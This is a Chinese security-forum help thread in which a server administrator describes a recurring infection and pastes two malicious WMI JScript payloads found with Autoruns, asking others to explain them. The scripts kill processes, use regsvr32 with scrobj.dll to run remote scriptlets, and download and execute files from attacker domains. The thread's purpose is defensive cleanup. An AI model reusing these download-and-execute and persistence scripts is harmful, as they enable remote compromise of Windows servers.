查看: 684|回复: 18
收起左侧

[求助] 服务器中毒,发现可能是通过WMI脚本发作,怎样完全清除

[复制链接]
lucifersm
发表于 2017-9-8 17:19:03 | 显示全部楼层 |阅读模式
本帖最后由 lucifersm 于 2017-9-8 17:20 编辑

之前删掉发现的文件后用麦咖啡开了全盘锁定生成可执行文件,前几天没发现特别的生成,今天查日志发现C:\WINDOWS\SYSTEM32\WBEM\SCRCONS.EXE这个文件在生成病毒文件LSMOSEE.EXE,然后搜了一下发现有说是通过wmi脚本操作的,然后我按http://bbs.kafan.cn/thread-2047183-1-1.html这个帖子下了autoruns发现wmi下果然有问题脚本,请问该怎样清除,直接点删除?能查出这个脚本所有的操作吗,可以让我检查哪里有未删干净的余孽
QQ图片20170908171831.jpg
hack528
发表于 2017-9-8 18:40:39 | 显示全部楼层
删除就可以了
专业路过
发表于 2017-9-9 15:12:49 | 显示全部楼层
http://bbs.kafan.cn/thread-2101062-1-1.html
看这个帖子,改mssql、终端服务密码,改的强壮些
kxmp
发表于 2017-9-9 22:48:32 | 显示全部楼层
这个你主要把远程控制密码弄强些就行了.
iis之类的要打补丁.
lucifersm
 楼主| 发表于 2017-9-11 09:34:38 | 显示全部楼层
专业路过 发表于 2017-9-9 15:12
http://bbs.kafan.cn/thread-2101062-1-1.html
看这个帖子,改mssql、终端服务密码,改的强壮些

原本的就已经是超过10位的强密码,可能是通过IIS或者sql漏洞进来的?
lucifersm
 楼主| 发表于 2017-9-11 10:22:22 | 显示全部楼层
他这个病毒入侵方式比较复杂,并不是简单进来一次就算了,他是通过多个bat、exe、dll、windows工作任务,sql作业进行不断的下载病毒和bat文件以及修改sql的sa密码,他下载的很多文件杀毒软件都检测不了,因为他很多就是各种不同方式的脚本命令,这些命令就是定时在指定域名下载文件,有些下载的是bat有些是exe,运行病毒绕了很多圈,现在能删除的都是最末端的病毒本体,前端的入侵和脚本运行都发现不了,所以我想把他整体扯出来。刚发现用autoruns也是把wmi的脚本内容显示出来了,下面复制一下过来,请帮忙看看他具体做了哪些操作,有些我看不太懂,谢谢!
lucifersm
 楼主| 发表于 2017-9-11 10:46:55 | 显示全部楼层
[JavaScript] 纯文本查看 / 双击代码区域 Ctrl+A快速复制
var toff=5000;var locator=new ActiveXObject("WbemScripting.SWbemLocator");var service=locator.ConnectServer(".","root/cimv2");var colItems=service.ExecQuery("select * from Win32_Process");var e=new Enumerator(colItems);var t1=new Date().valueOf();for(;!e.atEnd();e.moveNext()){var p=e.item();if(p.Caption=="rundll32.exe")p.Terminate()};var t2=0;while(t2-t1<toff){var t2=new Date().valueOf()}var pp=service.get("Win32_Process");pp.create("regsvr32 /s shell32.dll");pp.create("regsvr32 /s WSHom.Ocx");pp.create("regsvr32 /s scrrun.dll");pp.create("regsvr32 /s c:\\Progra~1\\Common~1\\System\\Ado\\Msado15.dll");pp.create("regsvr32 /s jscript.dll");pp.create("regsvr32 /u /s /i:[url]http://js.mys2016.info:280/v.sct[/url] scrobj.dll");pp.create("rundll32.exe c:\\windows\\debug\\item.dat,ServiceMain aaaa");pp.create("c:\\windows\\system\\msinfo.exe -syn 1000");


前面的那些数据库操作我看不懂,他作用是什么?
下面rundll32.exe那一块是注入吗?
pp.create那堆是创建文件吗?
c:\\Progra~1\\Common~1\\System\\Ado\\Msado15.dll这个位置里我找到了一堆病毒爆发那个时间段创建的文件,那些都是病毒相关文件吗?
QQ截图20170911103244.jpg

c:\\windows\\debug\\item.dat和c:\\windows\\system\\msinfo.exe已经找不到,item可能是之前被我手动删了,msinfo是杀毒删的,另外我突然发现explorer.exe的创建时间也是病毒爆发那一天,难道是被替换了?但是扫病毒没反应,是不是应该另外找一个覆盖回去?我是2008r2,explorer.exe的大小是2,870,272字节,占用是2,871,296字节。

这脚本里有没有是替换系统文件的内容?


这是第二个WMI脚本
[JavaScript] 纯文本查看 / 双击代码区域 Ctrl+A快速复制
var toff=3000;var url1 = "http://www.cyg2016.xyz:8888/kill.html";http = new ActiveXObject("Msxml2.ServerXMLHTTP");fso = new ActiveXObject("Scripting.FilesystemObject");wsh = new ActiveXObject("WScript.Shell");http.open("GET", url1, false);http.send();str = http.responseText;arr = str.split("\r\n");for (i = 0; i < arr.length; i++) { t = arr[i].split(" "); proc = t[0]; path = t[1]; dele = t[2]; wsh.Run("taskkill /f /im " + proc, 0, true);if (dele == 0) { try { fso.DeleteFile(path, true); } catch (e) {} } };var locator=new ActiveXObject("WbemScripting.SWbemLocator");var service=locator.ConnectServer(".","root/cimv2");var colItems=service.ExecQuery("select * from Win32_Process");var e=new Enumerator(colItems);var t1=new Date().valueOf();for(;!e.atEnd();e.moveNext()){var p=e.item();if(p.Caption=="rundll32.exe")p.Terminate()};var t2=0;while(t2-t1<toff){var t2=new Date().valueOf()}var pp=service.get("Win32_Process");var url="http://www.cyg2016.xyz:8888/test.html",http=new ActiveXObject("Microsoft.XMLHTTP"),ado=new ActiveXObject("ADODB.Stream"),wsh=new ActiveXObject("WScript.Shell");for(http.open("GET",url,!1),http.send(),str=http.responseText,arr=str.split("\r\n"),i=0;arr.length>i;i++)t=arr[i].split(" ",3),http.open("GET",t[0],!1),http.send(),ado.Type=1,ado.Open(),ado.Write(http.responseBody),ado.SaveToFile(t[1],2),ado.Close(),1==t[2]&&wsh.Run(t[1]);pp.create("regsvr32 /s shell32.dll");pp.create("regsvr32 /s WSHom.Ocx");pp.create("regsvr32 /s scrrun.dll");pp.create("regsvr32 /s c:\\Progra~1\\Common~1\\System\\Ado\\Msado15.dll");pp.create("regsvr32 /s jscript.dll");pp.create("regsvr32 /u /s /i:[url]http://js.mykings.top:280/v.sct[/url] scrobj.dll");pp.create("rundll32.exe c:\\windows\\debug\\item.dat,ServiceMain aaaa");


这个一堆都看不懂了。。。求大神。
lucifersm
 楼主| 发表于 2017-9-11 10:49:53 | 显示全部楼层
kxmp 发表于 2017-9-9 22:48
这个你主要把远程控制密码弄强些就行了.
iis之类的要打补丁.

我今天终于找到了wmi的脚本内容了,请帮忙看一下他还有没有藏有后门,谢谢!
kaba2017
发表于 2017-9-11 13:41:01 | 显示全部楼层
首先备份好重要文件,然后镜像杀毒u盘杀毒即可清除!
lucifersm
 楼主| 发表于 2017-9-11 14:47:12 | 显示全部楼层
本帖最后由 lucifersm 于 2017-9-11 14:51 编辑
kaba2017 发表于 2017-9-11 13:41
首先备份好重要文件,然后镜像杀毒u盘杀毒即可清除!

镜像杀毒是什么来的,现在问题是杀毒软件只能检测到攻击和后门的程序,但是把病毒自动下载的脚本程序发现不了,导致病毒杀完又重新出来,已经被我发现的脚本文件类型包括bat、jpg和htm。。。。他的脚本也很简单,从网站下载XXX.zip文件到指定位置并重命名未XXX.exe,另外的脚本就是运行XXX.exe。还有就是如何定时执行脚本的现在还找不到源头,定时任务是我早上发的WMI脚本?

另外刚我搜镜像杀毒搜不到,反而收到镜像劫持,我检查了下服务器的注册表,貌似我还被镜像劫持了。。。。这个样子是被镜像劫持了吗,这一堆exe都有这个键值,看意思是像只要打开这些程序就立刻杀掉进程?
镜像劫持.jpg
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛|优惠券| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.3( 苏ICP备07004770号 ) GMT+8, 2017-9-20 13:42 , Processed in 0.100182 second(s), 6 queries , MemCache On.

快速回复 返回顶部 返回列表